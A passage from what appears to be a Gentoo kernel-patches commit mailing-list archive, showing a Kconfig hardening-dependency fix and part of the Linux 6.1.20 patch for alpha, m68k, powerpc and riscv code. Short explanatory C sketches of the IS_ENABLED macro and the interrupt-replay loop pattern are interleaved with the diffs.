+                 if ports[port]['flavour'] == 'physical':
+@@ -220,6 +222,27 @@ def split_splittable_port(port, k, lanes, dev):
+     unsplit(port.bus_info)
+ 
+ 
++def validate_devlink_output(devlink_data, target_property=None):
++    """
++    Determine if test should be skipped by checking:
++      1. devlink_data contains values
++      2. The target_property exist in devlink_data
++    """
++    skip_reason = None
++    if any(devlink_data.values()):
++        if target_property:
++            skip_reason = "{} not found in devlink output, test skipped".format(target_property)
++            for key in devlink_data:
++                if target_property in devlink_data[key]:
++                    skip_reason = None
++    else:
++        skip_reason = 'devlink output is empty, test skipped'
++
++    if skip_reason:
++        print(skip_reason)
++        sys.exit(KSFT_SKIP)
++
++
+ def make_parser():
+     parser = argparse.ArgumentParser(description='A test for port splitting.')
+     parser.add_argument('--dev',
+@@ -240,12 +263,9 @@ def main(cmdline=None):
+         stdout, stderr = run_command(cmd)
+         assert stderr == ""
+ 
++        validate_devlink_output(json.loads(stdout))
+         devs = json.loads(stdout)['dev']
+-        if devs:
+-            dev = list(devs.keys())[0]
+-        else:
+-            print("no devlink device was found, test skipped")
+-            sys.exit(KSFT_SKIP)
++        dev = list(devs.keys())[0]
+ 
+     cmd = "devlink dev show %s" % dev
+     stdout, stderr = run_command(cmd)
+@@ -255,6 +275,7 @@ def main(cmdline=None):
+ 
+     ports = devlink_ports(dev)
+ 
++    found_max_lanes = False
+     for port in ports.if_names:
+         max_lanes = get_max_lanes(port.name)
+ 
+@@ -277,6 +298,11 @@ def main(cmdline=None):
+                 split_splittable_port(port, lane, max_lanes, dev)
+ 
+                 lane //= 2
++        found_max_lanes = True
++
++    if not found_max_lanes:
++        print(f"Test not started, no port of device {dev} reports max_lanes")
++        sys.exit(KSFT_SKIP)
+ 
+ 
+ if __name__ == "__main__":


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-21 13:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-21 13:32 UTC (permalink / raw
  To: gentoo-commits

commit:     3bfe7b2e69232e514f1e7d6f7ed8302bf4878467
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Mar 21 12:58:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Mar 21 13:31:49 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3bfe7b2e

Fix config change from X86_X32 to X86_X32_ABI

Thanks to Frank Limpert

Bug: https://bugs.gentoo.org/902443

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 9e0701dd..9cb1eb0c 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -185,7 +185,7 @@
 +config GENTOO_KERNEL_SELF_PROTECTION_COMMON
 +	bool "Enable Kernel Self Protection Project Recommendations"
 +
-+	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32 && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
++	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32_ABI && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
 +
 +	select BUG
 +	select STRICT_KERNEL_RWX


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-17 10:43 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-17 10:43 UTC (permalink / raw
  To: gentoo-commits

commit:     37741a37bb8ed70e4d9d33faf73da22b41dbf0d1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 17 10:43:15 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 17 10:43:15 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=37741a37

Linux patch 6.1.20

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1019_linux-6.1.20.patch | 6280 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6284 insertions(+)

diff --git a/0000_README b/0000_README
index 3728b6a9..4b2b0a69 100644
--- a/0000_README
+++ b/0000_README
@@ -119,6 +119,10 @@ Patch:  1018_linux-6.1.19.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.19
 
+Patch:  1019_linux-6.1.20.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.20
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1019_linux-6.1.20.patch b/1019_linux-6.1.20.patch
new file mode 100644
index 00000000..66126f8f
--- /dev/null
+++ b/1019_linux-6.1.20.patch
@@ -0,0 +1,6280 @@
+diff --git a/Makefile b/Makefile
+index ea18c4c20738c..a842ec6d19325 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 19
++SUBLEVEL = 20
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/alpha/kernel/module.c b/arch/alpha/kernel/module.c
+index 5b60c248de9ea..cbefa5a773846 100644
+--- a/arch/alpha/kernel/module.c
++++ b/arch/alpha/kernel/module.c
+@@ -146,10 +146,8 @@ apply_relocate_add(Elf64_Shdr *sechdrs, const char *strtab,
+ 	base = (void *)sechdrs[sechdrs[relsec].sh_info].sh_addr;
+ 	symtab = (Elf64_Sym *)sechdrs[symindex].sh_addr;
+ 
+-	/* The small sections were sorted to the end of the segment.
+-	   The following should definitely cover them.  */
+-	gp = (u64)me->core_layout.base + me->core_layout.size - 0x8000;
+ 	got = sechdrs[me->arch.gotsecindex].sh_addr;
++	gp = got + 0x8000;
+ 
+ 	for (i = 0; i < n; i++) {
+ 		unsigned long r_sym = ELF64_R_SYM (rela[i].r_info);
+diff --git a/arch/m68k/kernel/setup_mm.c b/arch/m68k/kernel/setup_mm.c
+index 3a2bb2e8fdad4..fbff1cea62caa 100644
+--- a/arch/m68k/kernel/setup_mm.c
++++ b/arch/m68k/kernel/setup_mm.c
+@@ -326,16 +326,16 @@ void __init setup_arch(char **cmdline_p)
+ 		panic("No configuration setup");
+ 	}
+ 
+-#ifdef CONFIG_BLK_DEV_INITRD
+-	if (m68k_ramdisk.size) {
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size)
+ 		memblock_reserve(m68k_ramdisk.addr, m68k_ramdisk.size);
++
++	paging_init();
++
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size) {
+ 		initrd_start = (unsigned long)phys_to_virt(m68k_ramdisk.addr);
+ 		initrd_end = initrd_start + m68k_ramdisk.size;
+ 		pr_info("initrd: %08lx - %08lx\n", initrd_start, initrd_end);
+ 	}
+-#endif
+-
+-	paging_init();
+ 
+ #ifdef CONFIG_NATFEAT
+ 	nf_init();
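
The setup_mm.c change above trades #ifdef blocks for IS_ENABLED(), keeping both
branches visible to the compiler so disabled code still gets type-checked. The
macro rests on a token-pasting trick that can be re-created in a few lines
(simplified to the =y/unset case; the real kernel version also handles =m):

#include <stdio.h>

#define __ARG_PLACEHOLDER_1 0,
#define __take_second_arg(__ignored, val, ...) val
#define __is_defined(x)    ___is_defined(x)
#define ___is_defined(val) ____is_defined(__ARG_PLACEHOLDER_##val)
#define ____is_defined(arg1_or_junk) __take_second_arg(arg1_or_junk 1, 0)
#define IS_ENABLED(option) __is_defined(option)

#define CONFIG_FOO 1 /* "enabled": expands to 1 */
/* CONFIG_BAR left undefined: "disabled" */

int main(void)
{
	if (IS_ENABLED(CONFIG_FOO))
		printf("FOO enabled\n");
	if (IS_ENABLED(CONFIG_BAR))
		printf("BAR enabled\n"); /* dead code, but still compiled */
	return 0;
}
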
+diff --git a/arch/mips/include/asm/mach-rc32434/pci.h b/arch/mips/include/asm/mach-rc32434/pci.h
+index 9a6eefd127571..3eb767c8a4eec 100644
+--- a/arch/mips/include/asm/mach-rc32434/pci.h
++++ b/arch/mips/include/asm/mach-rc32434/pci.h
+@@ -374,7 +374,7 @@ struct pci_msu {
+ 				 PCI_CFG04_STAT_SSE | \
+ 				 PCI_CFG04_STAT_PE)
+ 
+-#define KORINA_CNFG1		((KORINA_STAT<<16)|KORINA_CMD)
++#define KORINA_CNFG1		(KORINA_STAT | KORINA_CMD)
+ 
+ #define KORINA_REVID		0
+ #define KORINA_CLASS_CODE	0
+diff --git a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+index 73f8c998c64df..d4f5f159d6f23 100644
+--- a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
++++ b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+@@ -10,7 +10,6 @@
+ 
+ / {
+ 	model = "fsl,T1040RDB-REV-A";
+-	compatible = "fsl,T1040RDB-REV-A";
+ };
+ 
+ &seville_port0 {
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index eb6d094083fd6..317659fdeacf2 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -36,15 +36,17 @@
+ #define PACA_IRQ_DEC		0x08 /* Or FIT */
+ #define PACA_IRQ_HMI		0x10
+ #define PACA_IRQ_PMI		0x20
++#define PACA_IRQ_REPLAYING	0x40
+ 
+ /*
+  * Some soft-masked interrupts must be hard masked until they are replayed
+  * (e.g., because the soft-masked handler does not clear the exception).
++ * Interrupt replay itself must remain hard masked too.
+  */
+ #ifdef CONFIG_PPC_BOOK3S
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI|PACA_IRQ_REPLAYING)
+ #else
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_REPLAYING)
+ #endif
+ 
+ #endif /* CONFIG_PPC64 */
+diff --git a/arch/powerpc/include/asm/paca.h b/arch/powerpc/include/asm/paca.h
+index 09f1790d0ae16..0ab3511a47d77 100644
+--- a/arch/powerpc/include/asm/paca.h
++++ b/arch/powerpc/include/asm/paca.h
+@@ -295,7 +295,6 @@ extern void free_unused_pacas(void);
+ 
+ #else /* CONFIG_PPC64 */
+ 
+-static inline void allocate_paca_ptrs(void) { }
+ static inline void allocate_paca(int cpu) { }
+ static inline void free_unused_pacas(void) { }
+ 
+diff --git a/arch/powerpc/include/asm/smp.h b/arch/powerpc/include/asm/smp.h
+index f63505d74932b..6c6cb53d70458 100644
+--- a/arch/powerpc/include/asm/smp.h
++++ b/arch/powerpc/include/asm/smp.h
+@@ -26,6 +26,7 @@
+ #include <asm/percpu.h>
+ 
+ extern int boot_cpuid;
++extern int boot_cpu_hwid; /* PPC64 only */
+ extern int spinning_secondaries;
+ extern u32 *cpu_to_phys_id;
+ extern bool coregroup_enabled;
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index caebe1431596e..ee95937bdaf14 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -67,11 +67,9 @@ static void iommu_debugfs_add(struct iommu_table *tbl)
+ static void iommu_debugfs_del(struct iommu_table *tbl)
+ {
+ 	char name[10];
+-	struct dentry *liobn_entry;
+ 
+ 	sprintf(name, "%08lx", tbl->it_index);
+-	liobn_entry = debugfs_lookup(name, iommu_debugfs_dir);
+-	debugfs_remove(liobn_entry);
++	debugfs_lookup_and_remove(name, iommu_debugfs_dir);
+ }
+ #else
+ static void iommu_debugfs_add(struct iommu_table *tbl){}
+diff --git a/arch/powerpc/kernel/irq_64.c b/arch/powerpc/kernel/irq_64.c
+index eb2b380e52a0d..9dc0ad3c533a8 100644
+--- a/arch/powerpc/kernel/irq_64.c
++++ b/arch/powerpc/kernel/irq_64.c
+@@ -70,22 +70,19 @@ int distribute_irqs = 1;
+ 
+ static inline void next_interrupt(struct pt_regs *regs)
+ {
+-	/*
+-	 * Softirq processing can enable/disable irqs, which will leave
+-	 * MSR[EE] enabled and the soft mask set to IRQS_DISABLED. Fix
+-	 * this up.
+-	 */
+-	if (!(local_paca->irq_happened & PACA_IRQ_HARD_DIS))
+-		hard_irq_disable();
+-	else
+-		irq_soft_mask_set(IRQS_ALL_DISABLED);
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(irq_soft_mask_return() != IRQS_ALL_DISABLED);
++	}
+ 
+ 	/*
+ 	 * We are responding to the next interrupt, so interrupt-off
+ 	 * latencies should be reset here.
+ 	 */
++	lockdep_hardirq_exit();
+ 	trace_hardirqs_on();
+ 	trace_hardirqs_off();
++	lockdep_hardirq_enter();
+ }
+ 
+ static inline bool irq_happened_test_and_clear(u8 irq)
+@@ -97,22 +94,11 @@ static inline bool irq_happened_test_and_clear(u8 irq)
+ 	return false;
+ }
+ 
+-void replay_soft_interrupts(void)
++static void __replay_soft_interrupts(void)
+ {
+ 	struct pt_regs regs;
+ 
+ 	/*
+-	 * Be careful here, calling these interrupt handlers can cause
+-	 * softirqs to be raised, which they may run when calling irq_exit,
+-	 * which will cause local_irq_enable() to be run, which can then
+-	 * recurse into this function. Don't keep any state across
+-	 * interrupt handler calls which may change underneath us.
+-	 *
+-	 * Softirqs can not be disabled over replay to stop this recursion
+-	 * because interrupts taken in idle code may require RCU softirq
+-	 * to run in the irq RCU tracking context. This is a hard problem
+-	 * to fix without changes to the softirq or idle layer.
+-	 *
+ 	 * We use local_paca rather than get_paca() to avoid all the
+ 	 * debug_smp_processor_id() business in this low level function.
+ 	 */
+@@ -120,13 +106,20 @@ void replay_soft_interrupts(void)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+ 		WARN_ON_ONCE(mfmsr() & MSR_EE);
+ 		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(local_paca->irq_happened & PACA_IRQ_REPLAYING);
+ 	}
+ 
++	/*
++	 * PACA_IRQ_REPLAYING prevents interrupt handlers from enabling
++	 * MSR[EE] to get PMIs, which can result in more IRQs becoming
++	 * pending.
++	 */
++	local_paca->irq_happened |= PACA_IRQ_REPLAYING;
++
+ 	ppc_save_regs(&regs);
+ 	regs.softe = IRQS_ENABLED;
+ 	regs.msr |= MSR_EE;
+ 
+-again:
+ 	/*
+ 	 * Force the delivery of pending soft-disabled interrupts on PS3.
+ 	 * Any HV call will have this side effect.
+@@ -175,13 +168,14 @@ again:
+ 		next_interrupt(&regs);
+ 	}
+ 
+-	/*
+-	 * Softirq processing can enable and disable interrupts, which can
+-	 * result in new irqs becoming pending. Must keep looping until we
+-	 * have cleared out all pending interrupts.
+-	 */
+-	if (local_paca->irq_happened & ~PACA_IRQ_HARD_DIS)
+-		goto again;
++	local_paca->irq_happened &= ~PACA_IRQ_REPLAYING;
++}
++
++void replay_soft_interrupts(void)
++{
++	irq_enter(); /* See comment in arch_local_irq_restore */
++	__replay_soft_interrupts();
++	irq_exit();
+ }
+ 
+ #if defined(CONFIG_PPC_BOOK3S_64) && defined(CONFIG_PPC_KUAP)
+@@ -200,13 +194,13 @@ static inline void replay_soft_interrupts_irqrestore(void)
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(AMR_KUAP_BLOCKED);
+ 
+-	replay_soft_interrupts();
++	__replay_soft_interrupts();
+ 
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(kuap_state);
+ }
+ #else
+-#define replay_soft_interrupts_irqrestore() replay_soft_interrupts()
++#define replay_soft_interrupts_irqrestore() __replay_soft_interrupts()
+ #endif
+ 
+ notrace void arch_local_irq_restore(unsigned long mask)
+@@ -219,9 +213,13 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 		return;
+ 	}
+ 
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON_ONCE(in_nmi() || in_hardirq());
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON_ONCE(in_nmi());
++		WARN_ON_ONCE(in_hardirq());
++		WARN_ON_ONCE(local_paca->irq_happened & PACA_IRQ_REPLAYING);
++	}
+ 
++again:
+ 	/*
+ 	 * After the stb, interrupts are unmasked and there are no interrupts
+ 	 * pending replay. The restart sequence makes this atomic with
+@@ -248,6 +246,12 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+ 		WARN_ON_ONCE(!(mfmsr() & MSR_EE));
+ 
++	/*
++	 * If we came here from the replay below, we might have a preempt
++	 * pending (due to preempt_enable_no_resched()). Have to check now.
++	 */
++	preempt_check_resched();
++
+ 	return;
+ 
+ happened:
+@@ -261,6 +265,7 @@ happened:
+ 		irq_soft_mask_set(IRQS_ENABLED);
+ 		local_paca->irq_happened = 0;
+ 		__hard_irq_enable();
++		preempt_check_resched();
+ 		return;
+ 	}
+ 
+@@ -296,12 +301,38 @@ happened:
+ 	irq_soft_mask_set(IRQS_ALL_DISABLED);
+ 	trace_hardirqs_off();
+ 
++	/*
++	 * Now enter interrupt context. The interrupt handlers themselves
++	 * also call irq_enter/exit (which is okay, they can nest). But call
++	 * it here now to hold off softirqs until the below irq_exit(). If
++	 * we allowed replayed handlers to run softirqs, that enables irqs,
++	 * which must replay interrupts, which recurses in here and makes
++	 * things more complicated. The recursion is limited to 2, and it can
++	 * be made to work, but it's complicated.
++	 *
++	 * local_bh_disable can not be used here because interrupts taken in
++	 * idle are not in the right context (RCU, tick, etc) to run softirqs
++	 * so irq_enter must be called.
++	 */
++	irq_enter();
++
+ 	replay_soft_interrupts_irqrestore();
+ 
++	irq_exit();
++
++	if (unlikely(local_paca->irq_happened != PACA_IRQ_HARD_DIS)) {
++		/*
++		 * The softirq processing in irq_exit() may enable interrupts
++		 * temporarily, which can result in MSR[EE] being enabled and
++		 * more irqs becoming pending. Go around again if that happens.
++		 */
++		trace_hardirqs_on();
++		preempt_enable_no_resched();
++		goto again;
++	}
++
+ 	trace_hardirqs_on();
+ 	irq_soft_mask_set(IRQS_ENABLED);
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON(local_paca->irq_happened != PACA_IRQ_HARD_DIS);
+ 	local_paca->irq_happened = 0;
+ 	__hard_irq_enable();
+ 	preempt_enable();
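
The PACA_IRQ_REPLAYING flag plus the again: loop replace recursion with
iteration: replay cannot re-enter itself while the flag is set, and anything
that became pending during replay is picked up on the next pass. The
control-flow shape, reduced to a standalone sketch (names are illustrative):

#include <stdbool.h>
#include <stdio.h>

static bool replaying; /* stands in for PACA_IRQ_REPLAYING */
static int pending;    /* stands in for the irq_happened bits */

static void handle_one(void)
{
	static bool raised_more;

	printf("handling one event\n");
	if (!raised_more) {
		raised_more = true;
		pending++; /* a handler can make more work pending */
	}
}

static void replay(void)
{
	if (replaying) /* guard: replay must never re-enter itself */
		return;
	replaying = true;
	while (pending) { /* loop until nothing new became pending */
		pending--;
		handle_one();
	}
	replaying = false;
}

int main(void)
{
	pending = 2;
	replay(); /* handles 3 events in total, with no recursion */
	return 0;
}
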
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 1eed87d954ba8..8537c354c560b 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -366,8 +366,8 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	    be32_to_cpu(intserv[found_thread]));
+ 	boot_cpuid = found;
+ 
+-	// Pass the boot CPU's hard CPU id back to our caller
+-	*((u32 *)data) = be32_to_cpu(intserv[found_thread]);
++	if (IS_ENABLED(CONFIG_PPC64))
++		boot_cpu_hwid = be32_to_cpu(intserv[found_thread]);
+ 
+ 	/*
+ 	 * PAPR defines "logical" PVR values for cpus that
+@@ -751,7 +751,6 @@ static inline void save_fscr_to_task(void) {}
+ 
+ void __init early_init_devtree(void *params)
+ {
+-	u32 boot_cpu_hwid;
+ 	phys_addr_t limit;
+ 
+ 	DBG(" -> early_init_devtree(%px)\n", params);
+@@ -847,7 +846,7 @@ void __init early_init_devtree(void *params)
+ 	/* Retrieve CPU related informations from the flat tree
+ 	 * (altivec support, boot CPU ID, ...)
+ 	 */
+-	of_scan_flat_dt(early_init_dt_scan_cpus, &boot_cpu_hwid);
++	of_scan_flat_dt(early_init_dt_scan_cpus, NULL);
+ 	if (boot_cpuid < 0) {
+ 		printk("Failed to identify boot CPU !\n");
+ 		BUG();
+@@ -864,11 +863,6 @@ void __init early_init_devtree(void *params)
+ 
+ 	mmu_early_init_devtree();
+ 
+-	// NB. paca is not installed until later in early_setup()
+-	allocate_paca_ptrs();
+-	allocate_paca(boot_cpuid);
+-	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+-
+ #ifdef CONFIG_PPC_POWERNV
+ 	/* Scan and build the list of machine check recoverable ranges */
+ 	of_scan_flat_dt(early_init_dt_scan_recoverable_ranges, NULL);
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index 6d041993a45dc..efb301a4987ca 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -86,6 +86,10 @@ EXPORT_SYMBOL(machine_id);
+ int boot_cpuid = -1;
+ EXPORT_SYMBOL_GPL(boot_cpuid);
+ 
++#ifdef CONFIG_PPC64
++int boot_cpu_hwid = -1;
++#endif
++
+ /*
+  * These are used in binfmt_elf.c to put aux entries on the stack
+  * for each elf executable being started.
+diff --git a/arch/powerpc/kernel/setup_64.c b/arch/powerpc/kernel/setup_64.c
+index a0dee7354fe6b..b2e0d3ce4261c 100644
+--- a/arch/powerpc/kernel/setup_64.c
++++ b/arch/powerpc/kernel/setup_64.c
+@@ -385,17 +385,21 @@ void __init early_setup(unsigned long dt_ptr)
+ 	/*
+ 	 * Do early initialization using the flattened device
+ 	 * tree, such as retrieving the physical memory map or
+-	 * calculating/retrieving the hash table size.
++	 * calculating/retrieving the hash table size, discover
++	 * boot_cpuid and boot_cpu_hwid.
+ 	 */
+ 	early_init_devtree(__va(dt_ptr));
+ 
+-	/* Now we know the logical id of our boot cpu, setup the paca. */
+-	if (boot_cpuid != 0) {
+-		/* Poison paca_ptrs[0] again if it's not the boot cpu */
+-		memset(&paca_ptrs[0], 0x88, sizeof(paca_ptrs[0]));
+-	}
++	allocate_paca_ptrs();
++	allocate_paca(boot_cpuid);
++	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+ 	fixup_boot_paca(paca_ptrs[boot_cpuid]);
+ 	setup_paca(paca_ptrs[boot_cpuid]); /* install the paca into registers */
++	// smp_processor_id() now reports boot_cpuid
++
++#ifdef CONFIG_SMP
++	task_thread_info(current)->cpu = boot_cpuid; // fix task_cpu(current)
++#endif
+ 
+ 	/*
+ 	 * Configure exception handlers. This include setting up trampolines
+diff --git a/arch/powerpc/kernel/time.c b/arch/powerpc/kernel/time.c
+index f157552d79b38..285159e65a3ba 100644
+--- a/arch/powerpc/kernel/time.c
++++ b/arch/powerpc/kernel/time.c
+@@ -374,7 +374,7 @@ void vtime_flush(struct task_struct *tsk)
+ #define calc_cputime_factors()
+ #endif
+ 
+-void __delay(unsigned long loops)
++void __no_kcsan __delay(unsigned long loops)
+ {
+ 	unsigned long start;
+ 
+@@ -395,7 +395,7 @@ void __delay(unsigned long loops)
+ }
+ EXPORT_SYMBOL(__delay);
+ 
+-void udelay(unsigned long usecs)
++void __no_kcsan udelay(unsigned long usecs)
+ {
+ 	__delay(tb_ticks_per_usec * usecs);
+ }
+diff --git a/arch/powerpc/net/bpf_jit_comp32.c b/arch/powerpc/net/bpf_jit_comp32.c
+index a379b0ce19ffa..8643b2c8b76ef 100644
+--- a/arch/powerpc/net/bpf_jit_comp32.c
++++ b/arch/powerpc/net/bpf_jit_comp32.c
+@@ -79,6 +79,20 @@ static int bpf_jit_stack_offsetof(struct codegen_context *ctx, int reg)
+ #define SEEN_NVREG_FULL_MASK	0x0003ffff /* Non volatile registers r14-r31 */
+ #define SEEN_NVREG_TEMP_MASK	0x00001e01 /* BPF_REG_5, BPF_REG_AX, TMP_REG */
+ 
++static inline bool bpf_has_stack_frame(struct codegen_context *ctx)
++{
++	/*
++	 * We only need a stack frame if:
++	 * - we call other functions (kernel helpers), or
++	 * - we use non volatile registers, or
++	 * - we use tail call counter, or
++	 * - the bpf program uses its stack area
++	 * The latter condition is deduced from the usage of BPF_REG_FP
++	 */
++	return ctx->seen & (SEEN_FUNC | SEEN_TAILCALL | SEEN_NVREG_FULL_MASK) ||
++	       bpf_is_seen_register(ctx, bpf_to_ppc(BPF_REG_FP));
++}
++
+ void bpf_jit_realloc_regs(struct codegen_context *ctx)
+ {
+ 	unsigned int nvreg_mask;
+@@ -118,7 +132,8 @@ void bpf_jit_build_prologue(u32 *image, struct codegen_context *ctx)
+ 
+ #define BPF_TAILCALL_PROLOGUE_SIZE	4
+ 
+-	EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_TAILCALL)
+ 		EMIT(PPC_RAW_STW(_R4, _R1, bpf_jit_stack_offsetof(ctx, BPF_PPC_TC)));
+@@ -171,7 +186,8 @@ static void bpf_jit_emit_common_epilogue(u32 *image, struct codegen_context *ctx
+ 		EMIT(PPC_RAW_LWZ(_R0, _R1, BPF_PPC_STACKFRAME(ctx) + PPC_LR_STKOFF));
+ 
+ 	/* Tear down our stack frame */
+-	EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_FUNC)
+ 		EMIT(PPC_RAW_MTLR(_R0));
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index ba8050e63acfb..8b4ddccea2795 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -87,6 +87,13 @@ endif
+ # Avoid generating .eh_frame sections.
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables
+ 
++# The RISC-V attributes frequently cause compatibility issues and provide no
++# information, so just turn them off.
++KBUILD_CFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_AFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_CFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++KBUILD_AFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ KBUILD_CFLAGS_MODULE += $(call cc-option,-mno-relax)
+ KBUILD_AFLAGS_MODULE += $(call as-option,-Wa$(comma)-mno-relax)
+ 
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 9e73922e1e2e5..d47d87c2d7e3d 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -109,6 +109,6 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec);
+ #define ftrace_init_nop ftrace_init_nop
+ #endif
+ 
+-#endif
++#endif /* CONFIG_DYNAMIC_FTRACE */
+ 
+ #endif /* _ASM_RISCV_FTRACE_H */
+diff --git a/arch/riscv/include/asm/parse_asm.h b/arch/riscv/include/asm/parse_asm.h
+index f36368de839f5..3cd00332d70f5 100644
+--- a/arch/riscv/include/asm/parse_asm.h
++++ b/arch/riscv/include/asm/parse_asm.h
+@@ -3,6 +3,9 @@
+  * Copyright (C) 2020 SiFive
+  */
+ 
++#ifndef _ASM_RISCV_INSN_H
++#define _ASM_RISCV_INSN_H
++
+ #include <linux/bits.h>
+ 
+ /* The bit field of immediate value in I-type instruction */
+@@ -217,3 +220,5 @@ static inline bool is_ ## INSN_NAME ## _insn(long insn) \
+ 	(RVC_X(x_, RVC_B_IMM_5_OPOFF, RVC_B_IMM_5_MASK) << RVC_B_IMM_5_OFF) | \
